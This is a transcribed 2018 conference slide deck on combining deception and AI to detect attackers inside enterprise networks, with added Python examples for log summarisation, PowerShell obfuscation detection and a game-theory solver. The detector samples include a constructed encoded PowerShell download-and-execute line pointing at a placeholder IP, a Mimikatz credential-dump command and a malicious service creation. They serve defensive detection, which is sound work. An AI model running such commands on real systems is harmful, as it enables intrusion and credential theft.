![Page 1: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/1.jpg)
A Game between Adversary and AI Scientist
Satnam, Arunabha, Deepak, Waseem, Nirmesh, Santosh, Balamurali, Narayana (Acalvio Technologies)
NULLCON, March 3, 2018
Page 2
Who am I
• At Acalvio from Day 1
• 15+ years in DS, ML, AI
• General Motors, Samsung Research, CA Technologies
• Author: patents, tech publications and tech talks
• Rock climber
Page 3
Outline
• Define the Problem
• A possible solution - research work
• Demos
• Under the hood
Page 4
Problem
Page 5
Can we play a game with the adversary?
Can we engage with the adversary?
Page 6
Is the adversary visible to the defender?
- Extensive reconnaissance of the target and the defender
- Uses the same tools and techniques as the defender
Page 7
Is this a “returning” adversary?
—> Compare Tactics, Techniques and Procedures (TTPs)
Page 8
InfoSec Game: Assumptions
• Unlike chess, the cyber game has an effectively infinite state space
—> Use the MITRE ATT&CK model to define the state space
Page 9
Adversary Tactics
Page 10
MITRE ATT&CK Model
Page 11
Defender’s tools are at the perimeter
Need new tools to detect the adversary INSIDE the NETWORK
Page 12
Deceptions in Enterprise
• Deceptions (D):
  - Emulations of hosts, applications, database servers, etc.
  - Real VM hosts, applications, etc.
  - Browser cookies, registry entries, etc.
  - Vulnerabilities in OS/applications, shares, etc.
[Diagram: enterprise network with SOC, Engineering, Ops and Sales segments connected over fiber; deceptions (D) placed alongside real hosts such as MUM-EPS-4343, MUM-EPS-4322, MUM-EPS-4453, SFO-GAMMA-2318, SFO-GAMMA-3123, BENG-ALPHA-4323 and BENG-ALPHA-5662]
Page 13
AI Engine
[Diagram: HIDS logs (process, registry, Bro, …) feed the AI Engine]
Page 14
Game: Demos
Page 15
1: Recon - nmap
Adversary: performs reconnaissance with nmap to map the neighbourhood
Defender: detects the scan and plants a few RDP credentials on the endpoints as bait
Demo>>
Page 16
2: Obfuscated PowerShell Script
Adversary: obfuscates a PowerShell attack and executes it on another host
Defender: detects the obfuscated PowerShell commands
Demo>>
Page 17
3: Credential Dump using PowerSploit and Mimikatz
Adversary: dumps credentials using PowerSploit and Mimikatz
Defender: detects the PowerSploit and Mimikatz activity
Demo>>
Page 18
4: Data Exfiltration via DNS Tunnel
Adversary: uses a DNS tunnel (dnscat2) to exfiltrate the credentials
Defender: detects the DNS tunnel using AI
Demo>>
Page 19
Under the Hood
Page 20
High Interaction AI Engine
[Diagram: the adversary interacts with a deception (D); its HIDS logs (process, registry, Windows events, …) feed the HISH AI engines: Summarisation, DNS Tunnel Detector and PowerShell Log Analyser]
Page 21
HISH AI: HIDS Log Summarisation
Event Summarisation
• Summarise the attacker’s activities:
  - New services, processes, tasks and changes, etc.
  - File system changes, registry entries, etc.
  - Shell commands, Windows event and authentication logs, etc.
[Diagram: file event logs, process logs, registry logs, Windows event logs, … → Summarised Notables]
Page 22
HISH-AI: Summarisation Engine
Pipeline:
- Raw Log Preprocessing: registry logs, file logs, process logs, services logs, Bro logs, …
- Rule & Baseline Based Filtering: domain-knowledge rules plus a learned baseline
- Process-based Summarisation
- Output: Summarised Notables
Attack scenarios (input logs → output notables):
  Incident 1: 60K → 16
  Incident 2: 6K → 5
  Incident 3: 70K → 6
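Added example in Python of the filtering and summarisation stages above; this is not the HISH-AI code from the slides. A baseline of (parent process, child process) pairs is learned from a known-benign window, domain-knowledge rules flag known-bad events on their own, everything else that matches the baseline is dropped, and the survivors are rolled up per process into notables. The event rows, hostnames, command lines and the four rules are constructed for the example.

```python
"""Rule & baseline based filtering followed by process-based summarisation of
HIDS process logs. Added example for this page; not Acalvio's HISH-AI code."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample HIDS process events (ts, host, user, parent, image, cmdline); not real telemetry.
# A known-benign window, used to learn the baseline of (parent, image) pairs.
BASELINE_EVENTS = [
    ("2018-02-26 09:00:01", "MUM-EPS-4343", "svc", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("2018-02-26 09:00:05", "MUM-EPS-4343", "alice", "explorer.exe", "chrome.exe", "chrome.exe"),
    ("2018-02-26 09:01:10", "MUM-EPS-4343", "alice", "explorer.exe", "outlook.exe", "outlook.exe"),
    ("2018-02-26 09:02:00", "MUM-EPS-4343", "svc", "services.exe", "spoolsv.exe", "spoolsv.exe"),
]
# The incident window: the same background noise plus an encoded-PowerShell / Mimikatz / new-service chain.
INCIDENT_EVENTS = [
    ("2018-02-26 19:40:00", "MUM-EPS-4343", "svc", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("2018-02-26 19:40:02", "MUM-EPS-4343", "alice", "explorer.exe", "chrome.exe", "chrome.exe"),
    ("2018-02-26 19:41:00", "MUM-EPS-4343", "alice", "explorer.exe", "powershell.exe",
     "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("2018-02-26 19:41:30", "MUM-EPS-4343", "alice", "powershell.exe", "mimikatz.exe",
     "mimikatz.exe privilege::debug sekurlsa::logonpasswords"),
    ("2018-02-26 19:42:00", "MUM-EPS-4343", "alice", "powershell.exe", "sc.exe",
     "sc.exe create updsvc binPath= C:\\Users\\Public\\u.exe"),
    ("2018-02-26 19:42:10", "MUM-EPS-4343", "alice", "explorer.exe", "outlook.exe", "outlook.exe"),
    ("2018-02-26 19:43:00", "MUM-EPS-4343", "alice", "explorer.exe", "powershell.exe",
     "powershell.exe -NoP -EncodedCommand ZABuAHMAYwBhAHQAMgA="),
]

# Domain-knowledge rules (assumed for this example): each fires on a single event regardless of the baseline.
RULES = [
    ("encoded_powershell", lambda e: e["image"] == "powershell.exe"
     and re.search(r"-(e|ec|enc|encodedcommand)\b", e["cmdline"], re.I) is not None),
    ("credential_dumper", lambda e: e["image"] in {"mimikatz.exe", "procdump.exe"}),
    ("service_created", lambda e: e["image"] == "sc.exe" and " create " in e["cmdline"].lower()),
    ("task_created", lambda e: e["image"] == "schtasks.exe" and "/create" in e["cmdline"].lower()),
]

def to_event(row):
    ts, host, user, parent, image, cmdline = row
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "host": host, "user": user,
            "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline, "rules": []}

def learn_baseline(rows):
    """Learned baseline: the (parent, image) pairs observed in a known-benign window."""
    return {(e["parent"], e["image"]) for e in map(to_event, rows)}

def filter_events(rows, baseline):
    """Rule & baseline based filtering: an event survives if a rule fires on it
    or its (parent, image) pair was never seen in the baseline."""
    kept = []
    for e in map(to_event, rows):
        e["rules"] = [name for name, fires in RULES if fires(e)]
        if e["rules"] or (e["parent"], e["image"]) not in baseline:
            kept.append(e)
    return kept

def summarise(events):
    """Process-based summarisation: one notable per (host, image), carrying the count,
    time span, parents, fired rules and up to three distinct command lines."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["host"], e["image"])].append(e)
    notables = []
    for (host, image), evs in sorted(groups.items()):
        evs.sort(key=lambda e: e["ts"])
        notables.append({
            "host": host, "image": image, "count": len(evs),
            "first_seen": evs[0]["ts"].strftime("%H:%M:%S"),
            "last_seen": evs[-1]["ts"].strftime("%H:%M:%S"),
            "parents": sorted({e["parent"] for e in evs}),
            "rules": sorted({r for e in evs for r in e["rules"]}),
            "cmdlines": sorted({e["cmdline"] for e in evs})[:3],
        })
    return notables

def run(baseline_rows, incident_rows):
    """Returns (input log count, summarised notables): the ratio shown in the slide's table."""
    notables = summarise(filter_events(incident_rows, learn_baseline(baseline_rows)))
    return len(incident_rows), notables

if __name__ == "__main__":
    total, notables = run(BASELINE_EVENTS, INCIDENT_EVENTS)
    print(f"{total} input events -> {len(notables)} notables")
    for n in notables:
        print(f"{n['host']} {n['image']:<16} x{n['count']} {n['first_seen']}-{n['last_seen']} rules={n['rules']}")
```

Seven incident events collapse to three notables (mimikatz.exe, powershell.exe, sc.exe); the svchost, chrome and outlook events disappear because their parent/child pairs are in the baseline and no rule fires. In production the baseline would be learned per host or per role and re-learned as software changes, otherwise every patch cycle shows up as notables.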
Page 23
HISH-AI: PowerShell Log Engine
Pipeline:
- PowerShell logs
- Preprocessing: command N-grams and character N-grams
- Obfuscation Detection Model and Tactic Detection Model (TensorFlow ANN classifier)
- Output: Obfuscation prediction; Tactic prediction (Privilege Escalation, Lateral Movement, Exfiltration)
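Added example in Python of the preprocessing stage of the pipeline above; it is not the deck's PowerShell engine. It decodes -EncodedCommand payloads (base64 of UTF-16LE text), builds command n-grams over cmdlet tokens and character n-grams over the raw text, and turns obfuscation indicators (encoding, backtick escapes, string concatenation, [char] casts) into an additive score. That score stands in for the TensorFlow classifier in the slide; the cmdlet regex, the indicator weights and the two sample log lines are assumptions made for the example.

```python
"""Preprocessing for a PowerShell log engine: decode -EncodedCommand payloads,
build command and character n-grams, and score obfuscation indicators.
Added example for this page; not the HISH-AI PowerShell engine."""
import base64
import math
import re
from collections import Counter

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Cmdlet-style Verb-Noun tokens plus a few common aliases; an assumption for this example.
CMDLET_RE = re.compile(r"\b(?:[a-z]+-[a-z]+|iex|icm|iwr|irm|sal|saps)\b")
CONCAT_RE = re.compile(r"'[^']{1,3}'\s*\+")   # short quoted fragments joined with +

# Constructed sample log lines (not captured telemetry). The obfuscated one hides
# IEX and New-Object behind string concatenation and backtick escapes, then wraps
# everything in -EncodedCommand; 203.0.113.5 is a documentation address.
BENIGN = "powershell.exe Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }"
OBF_PLAINTEXT = "&('I'+'E'+'X')((Ne`w-Ob`ject Net.WebClient).Down`loadString('http://203.0.113.5/p.ps1'))"
OBFUSCATED = "powershell.exe -NoP -W Hidden -EncodedCommand " + base64.b64encode(
    OBF_PLAINTEXT.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(line):
    """-EncodedCommand carries base64 of UTF-16LE text; return the decoded script, else the line."""
    m = ENC_RE.search(line)
    if not m:
        return line
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return line

def normalise(line):
    """Preprocessing: decode, lower-case and collapse whitespace."""
    return re.sub(r"\s+", " ", decode_encoded_command(line).lower()).strip()

def command_ngrams(text, n=2):
    """Command n-grams over cmdlet tokens. A backtick inside a bare word is a PowerShell
    escape that inserts nothing, so strip backticks before tokenising."""
    tokens = CMDLET_RE.findall(text.replace("`", ""))
    return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

def char_ngrams(text, n=3):
    """Character n-grams; these still carry signal when the commands are hidden."""
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))

def entropy(text):
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values()) if text else 0.0

def obfuscation_features(line):
    text = normalise(line)
    return {
        "encoded": int(ENC_RE.search(line) is not None),
        "backticks": text.count("`"),
        "concat": len(CONCAT_RE.findall(text)),
        "char_casts": text.count("[char]"),
        "entropy": round(entropy(text), 3),
        "cmdlets": sum(command_ngrams(text, 1).values()),
    }

def classify(line, threshold=2):
    """Additive indicator score standing in for the slide's trained ANN classifier."""
    f = obfuscation_features(line)
    score = 2 * f["encoded"] + f["backticks"] + f["concat"] + f["char_casts"]
    return {"obfuscated": score >= threshold, "score": score, "features": f}

if __name__ == "__main__":
    for name, line in (("benign", BENIGN), ("obfuscated", OBFUSCATED)):
        r = classify(line)
        print(f"{name}: obfuscated={r['obfuscated']} score={r['score']} features={r['features']}")
        print("  command bigrams:", dict(command_ngrams(normalise(line))))
```

The benign line yields the command bigram (get-childitem, where-object) and a score of 0; the obfuscated line decodes to its plaintext, yields only new-object as a cmdlet token because IEX was assembled from single characters, and scores 7. That is why the slide feeds character n-grams alongside command n-grams: once the commands are hidden, the character distribution (backticks, quotes, plus signs) is what is left to learn from.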
Page 24
HISH-AI: Data exfiltration using DNS Tunnel
[Diagram: inside the enterprise network, a DNS tunnel client encodes data into queries such as data.dnstunnel.com; the local DNS server forwards them, alongside ordinary DNS and web traffic, to the DNS tunnel server that is authoritative for dnstunnel.com]
DNS tunnelling tools: Iodine, dnscat2, Ozyman
Page 25
HISH-AI: DNS Tunnel Detection
Pipeline:
- DNS logs
- Flow-based features and packet-metadata-based features
- Deep learning based model (TensorFlow), with model update
- Output: DNS tunnel prediction
DNS tunnel detection output:
• IP and domain of tunnelling server: dnstunnel.com
• Tunnel start time: 26-02-2018 19:43:37
• Tunnel end time: 26-02-2018 19:53:37
Page 26
Game Theory
Page 27
Formally Defining A Game
Defining the game in normal form. A finite 2-person normal-form game is a tuple <N, A, u>:
- Players: N = {Adversary, Defender} is a finite set of 2 players, indexed by i
- Action set for player i: A_i; an action profile is a = (a_1, ..., a_n) ∈ A = A_1 × ... × A_n
- Utility (payoff) function for player i: u_i; u = (u_1, ..., u_n) is a profile of utility functions
Page 28
InfoSec Game
• "Row" player is Defender, "column" player is Adversary; each cell is (Defender payoff, Adversary payoff)

                        Carry out attack    Quit
  Allow the attack      1,2                 2,1
  Block the adversary   2,2                 2,0

• Too simplistic
• How to scale it for the real world?
• How do we learn in real time?
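Added example, not part of the deck, that solves the 2x2 game above in Python: it computes each player's best responses and the pure-strategy Nash equilibria of <N, A, u> using the payoffs from the table, with cells read as (Defender, Adversary). The functions are generic over the action sets, so the same code works once the table grows beyond two actions per side.

```python
"""Best responses and pure-strategy Nash equilibria of the 2-player normal-form
InfoSec game from the slide. Added example for this page."""
from itertools import product

# N = {Defender, Adversary}; the row player is the Defender, the column player the Adversary.
ACTIONS = {
    "Defender": ["Allow the attack", "Block the adversary"],
    "Adversary": ["Carry out attack", "Quit"],
}
# PAYOFFS[(defender action, adversary action)] = (u_Defender, u_Adversary), copied from the slide.
PAYOFFS = {
    ("Allow the attack", "Carry out attack"): (1, 2),
    ("Allow the attack", "Quit"): (2, 1),
    ("Block the adversary", "Carry out attack"): (2, 2),
    ("Block the adversary", "Quit"): (2, 0),
}

def utility(player, defender_action, adversary_action):
    """u_i evaluated at an action profile."""
    return PAYOFFS[(defender_action, adversary_action)][0 if player == "Defender" else 1]

def best_responses(player, other_action):
    """Actions of `player` that maximise its payoff given the other player's action."""
    def u(a):
        return utility(player, a, other_action) if player == "Defender" else utility(player, other_action, a)
    best = max(u(a) for a in ACTIONS[player])
    return [a for a in ACTIONS[player] if u(a) == best]

def pure_nash_equilibria():
    """Profiles in which each player's action is a best response to the other's."""
    return [(d, a) for d, a in product(ACTIONS["Defender"], ACTIONS["Adversary"])
            if d in best_responses("Defender", a) and a in best_responses("Adversary", d)]

def dominant_strategy(player):
    """An action that is a best response to every action of the other player, if one exists."""
    other = "Adversary" if player == "Defender" else "Defender"
    for a in ACTIONS[player]:
        if all(a in best_responses(player, o) for o in ACTIONS[other]):
            return a
    return None

if __name__ == "__main__":
    for d, a in pure_nash_equilibria():
        print(f"Nash equilibrium: Defender '{d}', Adversary '{a}' -> payoffs {PAYOFFS[(d, a)]}")
    for p in ACTIONS:
        print(f"{p} dominant strategy: {dominant_strategy(p)}")
```

Block the adversary is a best response to both adversary actions, and Carry out attack is a best response to both defender actions, so the only pure equilibrium is (Block, Carry out) with payoffs (2, 2). That is one way to read the "too simplistic" remark: as written, the table gives the defender nothing for allowing and observing the attack, so engagement through deception cannot appear in the equilibrium until the utility function rewards the visibility it buys.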
Page 29
Model as a Reinforcement Learning Problem
• Break the problem into subproblems and learn in real time
• Model it as a reinforcement learning problem
Page 30
Summary
• Playing a game needs “visibility” of the adversary
• Need to surface the signal in a low-SNR environment
• Fusion of Deception + AI gives a way to engage with the adversary
Page 31
Questions?
@satnam74s